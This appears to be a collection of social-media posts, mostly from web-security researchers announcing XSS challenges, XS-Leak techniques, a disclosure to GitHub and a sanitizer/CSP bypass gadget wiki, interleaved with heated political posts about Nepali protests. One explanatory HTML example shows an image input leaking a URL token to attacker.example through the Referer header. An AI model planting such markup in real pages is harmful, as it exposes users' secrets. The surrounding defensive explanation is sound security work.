Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only!
https://t.co/v5LXrs5ORk
We responsibly disclosed the issue to @GitHub, who deployed a fix on https://t.co/SvN2lGsnbO the same day (!) and released patches for all supported GHES versions.
GitHub Enterprise Server customers are strongly encouraged to update immediately.
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
@DeSolti I feel ashamed to have studied in the same class as you. Whatever happened, what is wrong with showing it as it is? "timing this, timing that".. If something had happened to someone in your own home, you would probably have understood..
i built an entire x86 CPU emulator in CSS (no javascript)
you can write programs in C, compile them to x86 machine code with GCC, and run them inside CSS
Chrome implements referrerpolicy on <input type="image">, despite it not being in the HTML spec. Like on the in-spec elements, it takes precedence over the document policy for that request and can be abused to leak the page URL via the Referer header.
https://t.co/y2t4H4n43s
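A constructed illustration of the override described in the post (added here; not code from the original post). It assumes a hypothetical victim page that carries a secret in its URL, opts out of sending Referer at the document level, and ends up rendering attacker-supplied markup in which `<input type="image">` survived sanitization; the hostnames and token are placeholders.

```html
<!-- Constructed example, not from the original post. Hypothetical page URL:
     https://victim.example/reset?token=SECRET -->
<!DOCTYPE html>
<meta name="referrer" content="no-referrer">
<title>Password reset</title>

<!-- Attacker-controlled markup that a sanitizer let through because it only
     checked the tag name and src.  The per-element referrerpolicy takes
     precedence over the document policy for this one fetch. -->
<input type="image"
       src="https://attacker.example/collect.png"
       referrerpolicy="unsafe-url"
       alt="">

<!-- In Chrome, the request for collect.png carries
       Referer: https://victim.example/reset?token=SECRET
     even though the document policy is no-referrer.  An engine that does not
     implement referrerpolicy on <input type="image"> applies the document
     policy instead and sends no Referer. -->
```

To check a given browser, open a page like this with the network panel showing request headers and look at the Referer on the `collect.png` request. On the defensive side, a sanitizer allow-list should drop `referrerpolicy` on every element (not just `<a>`, `<img>`, `<iframe>` and the other in-spec carriers), and secrets should not live in URLs in the first place, since any element-level policy can re-enable the leak.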
Cross-Site ETag Length Leak
https://t.co/RYofmHVh6T
I just posted the author writeup for impossible-leak in SECCON CTF 14 Quals. As far as I know, this is a new XS-Leak technique! The ETag header can become a side channel :)
Dear Gen Z,
Through your contribution and sacrifice, the country has seen change.
Heartfelt tribute to the brave martyrs. Your contribution is invaluable, and it will always guide future generations on the path of patriotism and a sense of duty. Boundless respect to you.
I wish the injured a speedy recovery.
You turned out to be the father of your hired thugs.
Had you ever truly been a father, you would have understood the pain of losing sons and daughters.
The world has never seen terrorism like this.
You could not become a leader, not even a human being; you became a terrorist.
#kpoliisterriorist
Turns out my #PHRACK article is live! 🔥
> The Art of PHP — My CTF Journey and Untold Stories!
Kind of a love letter to those CTF players & PHP nerds! Hope all the credit goes to the right people. Also huge thanks to @0xdea for not forgetting me, @guitmz for the edits, and the @Phrack crew for keeping it real! 🎉
https://t.co/BMCLlHti7q
I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥
The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇
https://t.co/SgsSyxoEMR
1/4
It is pretty interesting that as I age and geohot ages, I end up noticing that we agree on more things than I thought in the past.
This here is a good read:
https://t.co/1QU0oVlWbi -- it's